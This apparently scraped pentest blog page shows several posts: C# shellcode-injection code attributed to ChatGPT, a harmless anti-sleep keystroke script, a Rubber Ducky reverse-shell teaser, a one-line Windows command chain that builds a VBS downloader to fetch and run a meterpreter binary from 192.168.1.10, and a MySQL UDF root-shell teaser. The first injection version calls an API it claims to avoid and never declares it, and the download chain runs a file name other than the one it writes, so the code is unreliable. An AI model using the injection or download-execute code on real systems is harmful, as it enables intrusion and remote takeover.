ChatGPT Suggested C# Inject Shell code

Standard

Here’s an optimized version of the C# code that injects shell code into a process without using NtAllocateVirtualMemory, NtCreateThreadEx, or CreateRemoteThread using ChatGPT

using System;
using System.Runtime.InteropServices;
using System.Diagnostics;

class Injector
{
    // OpenProcess function
    [DllImport("kernel32.dll")]
    private static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId);

    // VirtualAllocEx function
    [DllImport("kernel32.dll")]
    private static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

    // WriteProcessMemory function
    [DllImport("kernel32.dll")]
    private static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out UIntPtr lpNumberOfBytesWritten);

    // GetProcAddress function
    [DllImport("kernel32.dll", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
    private static extern IntPtr GetProcAddress(IntPtr hModule, string procName);

    // GetModuleHandle function
    [DllImport("kernel32.dll", CharSet = CharSet.Auto)]
    private static extern IntPtr GetModuleHandle(string lpModuleName);

    // Process handle
    private IntPtr handle;

    // Process ID
    private int pid;

    // Shellcode
    private byte[] shellcode;

    public Injector(int processId, byte[] code)
    {
        pid = processId;
        shellcode = code;
    }

    public bool Inject()
    {
        // Open the process with all access
        handle = OpenProcess(0x1F0FFF, false, pid);
        if (handle == IntPtr.Zero) return false;

        // Allocate memory in the process
        IntPtr allocatedMem = VirtualAllocEx(handle, IntPtr.Zero, (uint)shellcode.Length, 0x1000, 0x40);
        if (allocatedMem == IntPtr.Zero) return false;

        // Write the shellcode to the allocated memory
        UIntPtr bytesWritten;
        bool success = WriteProcessMemory(handle, allocatedMem, shellcode, (uint)shellcode.Length, out bytesWritten);
        if (!success) return false;

        // Get the address of the LoadLibrary function
        IntPtr loadLibraryAddr = GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA");
        if (loadLibraryAddr == IntPtr.Zero) return false;

        // Execute the shellcode by calling LoadLibraryA with the address of the shellcode as the argument
        IntPtr threadId = IntPtr.Zero;
        IntPtr hThread = CreateRemoteThread(handle, IntPtr.Zero, 0, loadLibraryAddr, allocatedMem, 0, threadId);
        if (hThread == IntPtr.Zero) return false;

        return true;
    }
}


Here is an example of optimized C# code that injects shell code into a process without using NtAllocateVirtualMemory, NtCreateThreadEx, and CreateRemoteThread:

using System;
using System.Runtime.InteropServices;
using System.Diagnostics;

class Injector
{
    [DllImport("kernel32.dll", SetLastError = true)]
    private static extern IntPtr OpenProcess(ProcessAccessFlags processAccess, bool bInheritHandle, int processId);

    [DllImport("kernel32.dll", SetLastError = true)]
    private static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, AllocationType flAllocationType, MemoryProtection flProtect);

    [DllImport("kernel32.dll", SetLastError = true)]
    private static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, int nSize, out int lpNumberOfBytesWritten);

    [DllImport("kernel32.dll", SetLastError = true)]
    private static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, out uint lpThreadId);

    [DllImport("kernel32.dll", SetLastError = true)]
    [return: MarshalAs(UnmanagedType.Bool)]
    private static extern bool CloseHandle(IntPtr hObject);

    public static void Inject(int pid, byte[] shellcode)
    {
        IntPtr hProcess = OpenProcess(ProcessAccessFlags.All, false, pid);
        IntPtr lpAddress = VirtualAllocEx(hProcess, IntPtr.Zero, (uint)shellcode.Length, AllocationType.Commit, MemoryProtection.ExecuteReadWrite);
        WriteProcessMemory(hProcess, lpAddress, shellcode, shellcode.Length, out int bytesWritten);
        uint threadId;
        IntPtr hThread = CreateThread(IntPtr.Zero, 0, lpAddress, IntPtr.Zero, 0, out threadId);
        CloseHandle(hThread);
        CloseHandle(hProcess);
    }

    static void Main(string[] args)
    {
        byte[] shellcode = new byte[20]; // replace this with your actual shellcode
        int pid = Process.GetCurrentProcess().Id; // replace this with the desired PID
        Inject(pid, shellcode);
    }
}

[Flags]
public enum ProcessAccessFlags : uint
{
    All = 0x001F0FFF,
    Terminate = 0x00000001,
    CreateThread = 0x00000002,
    VirtualMemoryOperation = 0x00000008,
    VirtualMemoryRead = 0x00000010,
    VirtualMemoryWrite = 0x00000020,
    DuplicateHandle = 0x00000040,
    CreateProcess = 0x000000080,
    SetQuota = 0x00000100,
    SetInformation = 0x00000200,
    QueryInformation = 0x00000400,
    QueryLimitedInformation = 0x00001000,
    Synchronize = 0x00100000
}

[Flags]
public enum AllocationType
{
    Commit = 0x1000,
   

Simple keystroke to prevent sleep

Standard
A simple script to double-tap on the numb lock to prevent the machine to sleep
This is a very simple script which can prevent the machine to sleep. 

Python 

import pyautogui
import time

while True:
    pyautogui.press('numlock')
    pyautogui.press('numlock')
    time.sleep(60)
Number lock key double tap
Windows Powershell

while ($true) {
    [System.Windows.Forms.SendKeys]::SendWait("{NUMLOCK}")
    [System.Windows.Forms.SendKeys]::SendWait("{NUMLOCK}")
    Start-Sleep -Seconds 60
}



Here is the same script written in PowerShell without using the System.Windows.Forms.SendKeys class:

while ($true) {
    Add-Type -AssemblyName System.Windows.Forms
    [System.Windows.Forms.SendKeys]::Send("{NUMLOCK}")
    [System.Windows.Forms.SendKeys]::Send("{NUMLOCK}")
    Start-Sleep -Seconds 60
}


Here is the same script written in PowerShell using the SendWait() method from the System.Windows.Forms.SendKeys class:

Add-Type -AssemblyName System.Windows.Forms
while ($true) {
[System.Windows.Forms.SendKeys]::SendWait("{NUMLOCK}")
[System.Windows.Forms.SendKeys]::SendWait("{NUMLOCK}")
Start-Sleep -Seconds 60
}

Rubber Ducky

Standard

During my recent internal BlackBox testing, I got a chance to use the rubber ducky. This device looks like a USB thumb drive, can be concealed inside a standard USB case and it acts as a keyboard. The script written on the SD card is called ducky script which is very easy to understand.

Since there are a lot of write-ups on the internet about the ducky ill just be posting on of the script I used in my recent pen-testing. I hope you may find it useful.

The script is written keeping in mind that not all windows OS are the same, and hardware specifications are different as well. While using the default scripts at times the system was not able to type complete code, hence you will see many spaces and delays.


Reverse Shell

Continue reading

Download Execute Alternate Method

Standard

During web application pentest performed on a windows box, we are at times able to upload a web shell and execute commands, Aim is to always get administrator privileges.
I stumbled upon this scenario where i wanted to run a meterpreter reverse binary through command execution vulnerability. Since i cannot wget or curl on a windows box, I found a way through VBS. This lets me download and execute an EXE.

echo Dim HTTPGET >> localexploit.vbs
echo Set HTTPGET = CreateObject(“Microsoft.XMLHTTP”) >> localexploit.vbs &&
echo HTTPGET.Open “GET”, “http://192.168.1.10/ring0.exe”, false >> localexploit.vbs
echo HTTPGET.Send >> localexploit.vbs
echo DataBin = HTTPGET.ResponseBody >> localexploit.vbs
echo Const adTypeBinary=1 >> localexploit.vbs
echo Const adSaveCreateOverWrite=2 >> localexploit.vbs
echo Dim SendBinary >> localexploit.vbs
echo Set SendBinary = CreateObject(“ADODB.Stream”) >> localexploit.vbs
echo SendBinary.Type = adTypeBinary >> localexploit.vbs
echo SendBinary.Open >> localexploit.vbs
echo SendBinary.Write DataBin >> localexploit.vbs
echo SendBinary.SaveToFile “ring0.exe”, adSaveCreateOverWrite >> localexploit.vbs
cscript //Nologo /B runexploit.vbs

This can be combined with local admin exploits to give the full control over the machine. The command can be sent in a single line by adding && , Please see the examples below.

echo Dim HTTPGET >> localexploit.vbs && echo Set HTTPGET = CreateObject(“Microsoft.XMLHTTP”) >> localexploit.vbs && echo HTTPGET.Open “GET”, “http://192.168.1.10/ring0.exe”, false >> localexploit.vbs && echo HTTPGET.Send >> localexploit.vbs && echo DataBin = HTTPGET.ResponseBody >> localexploit.vbs && echo Const adTypeBinary=1 >> localexploit.vbs && echo Const adSaveCreateOverWrite=2 >> localexploit.vbs && echo Dim SendBinary >> localexploit.vbs && echo Set SendBinary = CreateObject(“ADODB.Stream”) >> localexploit.vbs && echo SendBinary.Type = adTypeBinary >> localexploit.vbs && echo SendBinary.Open >> localexploit.vbs && echo SendBinary.Write DataBin >> localexploit.vbs && echo SendBinary.SaveToFile “ring0.exe”, adSaveCreateOverWrite >> localexploit.vbs && cscript //Nologo /B runexploit.vbs

MySQL UDF Injection

Standard

While performing a web application penetration testing, at times you are able to find out the web application is running MySQL database through  “root” credentials. This is one of the biggest NO of security. In this case, we can get a root shell on the machine with just a few commands. Here comes my second cheat sheet so that I do not forget this anymore.

Web Shell MySQL

Continue reading